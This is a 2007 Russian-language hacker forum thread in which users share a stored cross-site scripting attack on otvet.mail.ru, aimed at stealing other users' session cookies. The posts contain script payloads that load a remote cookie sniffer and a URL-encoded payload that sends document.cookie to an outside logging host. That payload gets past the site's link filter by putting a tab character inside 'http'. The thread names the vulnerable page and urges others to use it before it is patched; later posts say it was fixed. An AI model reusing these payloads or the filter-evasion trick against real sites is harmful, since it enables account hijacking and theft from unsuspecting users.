Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Активная XSS на otvet.mail.ru!!! |
11.01.2007, 11:42
|
|
Познающий
Регистрация: 10.01.2007
Сообщений: 35
Провел на форуме:
62785
Репутация:
34
|
|
Активная XSS на otvet.mail.ru!!!
Народ!!! Я нашёл XSS на otvet.mail.ru, но для её правильной работы ваша помошь нужна. Вот в чём вся суть, когда в вопрос (ответ) на этом сервисе вставляеш
Код:
%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
то это работает, но как только я хочу спереть чужие плюшки, то мэил фильтрует ссылку на сайт на котором стоит снифак. И как только я её (ссылку) не мучал, и переводил в разные кодировки и делал свой снифе вставлял код в ответ
Код:
<scriptsrc="http://www.naxodka.net/cookie.js"></script>
. Всё равно фильтрует гад, вот результат фильтрации
Код:
<script>location.href="<noindex><a target=_blank rel=nofollow href="http://ccl.whiteacid.org/log.php?182292">http://ccl.whiteacid.org/log.php?182292"...</a></noindex></script>
. По моему эта тема интерестна всем, так давайте её раскрутим, а?!!! 
Последний раз редактировалось DesignerMix; 11.01.2007 в 12:18..
|
|
|
11.01.2007, 13:11
|
|
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
Провел на форуме:
6860213
Репутация:
378
|
|
Ура!=)
тоже сначала кодировал в разные кодировки результата 0.
достачно было поставить табуляцию между ht и tp
вот весь код:
Код:
%3Cscript%3Eimg %3D new Image%28%29%3B img.src %3D %22ht%09tp%3A%2F%2Fold.antichat.ru%2Fcgi-bin%2Fs.jpg%3F%22+document.cookie%3B%3C%2Fscript%3E
страница с xss:
http://otvet.mail.ru/question/2334480/
юзаем пока не прикрыли=\ |
|
|
|
11.01.2007, 17:35
|
|
Новичок
Регистрация: 11.01.2007
Сообщений: 1
Провел на форуме:
3113
Репутация:
0
|
|
Сообщение от InferNo23
Ура!=)
тоже сначала кодировал в разные кодировки результата 0.
достачно было поставить табуляцию между ht и tp
вот весь код:
Код:
%3Cscript%3Eimg %3D new Image%28%29%3B img.src %3D %22ht%09tp%3A%2F%2Fold.antichat.ru%2Fcgi-bin%2Fs.jpg%3F%22+document.cookie%3B%3C%2Fscript%3E
страница с xss:
http://otvet.mail.ru/question/2334480/
юзаем пока не прикрыли=\ Спасибо! Давно искал рабочию!
|
|
|
|
11.01.2007, 21:07
|
|
Познающий
Регистрация: 10.01.2007
Сообщений: 35
Провел на форуме:
62785
Репутация:
34
|
|
Всё лафа кончилась...прикрыли уязвимость, но кого это пугает??? Будем новые искать =).
|
|
|
|
11.01.2007, 21:09
|
|
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814
Репутация:
3876
|
|
быстро ж они прикрывают..
пользуяюсь случаем, хочу передать привет сотрудникам Mail.Ru! =)
|
|
|
|
11.01.2007, 21:20
|
|
Banned
Регистрация: 13.12.2005
Сообщений: 1,091
Провел на форуме:
9751364
Репутация:
1847
|
|
Сообщение от Rebz
быстро ж они прикрывают..
пользуяюсь случаем, хочу передать привет сотрудникам Mail.Ru! =)
ага, Андрюша, привет )
|
|
|
|
11.01.2007, 22:32
|
|
Постоянный
Регистрация: 17.09.2005
Сообщений: 375
Провел на форуме:
993362
Репутация:
175
|
|
Rebz да тут им делать нечего, просто написали в открытую про активную ксску, ну и куча придурков сразу полезла ее непрекрыто вставлять везде где тока можно. Там уж админы не полные дураки. только на половину...
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
